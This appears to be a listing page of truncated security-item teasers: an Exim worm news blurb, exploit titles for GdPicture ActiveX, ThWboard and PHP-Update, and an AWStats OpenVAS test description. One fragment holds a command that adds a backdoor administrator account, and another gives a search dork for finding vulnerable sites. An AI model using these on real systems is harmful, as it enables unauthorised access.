Millions of Linux Servers Under Worm Attack Via Exim Flaw

A widespread campaign is exploiting a vulnerability in the Exim mail transport agent MTA to gain remote command-execution on victims’ Linux systems. Researchers say that currently more than 3.5 million servers are at risk from the attacks, which are using a wormable exploit. Specifically under...

GdPicture Pro - ActiveX gdpicture4s.ocx File Overwrite Exec

GdPicture Pro - ActiveX gdpicture4s.ocx File Overwrite Exec var cmd = "cmd /c net user test test /add & net localgroup Administrators test /add"; var outFile = "c:\windows\pchealth\helpctr\system\errors\badurl.htm"; var BMP = "\x42\x4d\x4...

ThWboard 3.0b2.84-php5 - SQL Injection / Code Execution

?php printr' ----------------------------------------------------------------------------- ThWboard =3.0 beta 2.84-php5 boardstyleid sql injection / cmd exec exploit by rgod dork: "powered by ThWboard" version specific: "powered by ThWboard 3 Beta 2.84-php5" "by Baecher & Gonschorek" mail: retrog...

PHP-Update 2.7 - Multiple Vulnerabilities

= 4.1 allowing subs / if $argc 126 $result.=" ."; else $result.=" ".$string$i; if...

AWStats configdir parameter arbitrary cmd exec

The remote host is running AWStats, a free real-time logfile analyzer. The remote version of this software is prone to an input validation vulnerability. The issue is reported to exist because user supplied OpenVAS Vulnerability Test $Id: awstatsconfigdir.nasl 6056 2017-05-02 09:02:50Z teissa $...